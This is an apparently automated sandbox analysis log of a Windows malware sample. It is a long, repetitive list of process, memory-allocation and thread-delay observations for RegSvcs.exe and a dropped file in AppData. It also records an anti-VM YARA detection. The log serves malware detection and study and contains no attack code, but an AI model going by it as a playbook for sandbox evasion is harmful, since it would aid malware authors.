                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: 3330000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: 5A80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: 6A80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: 6BB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: 7BB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: BC70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: CC70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: D100000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeMemory allocated: E100000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: 4D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: 5D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: 5E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: 6E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: A780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: B780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeMemory allocated: BC10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599326Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598999Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598124Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597685Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597567Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597452Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597233Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596577Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596249Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595155Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599808
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599461
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599247
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598465
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596374
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827
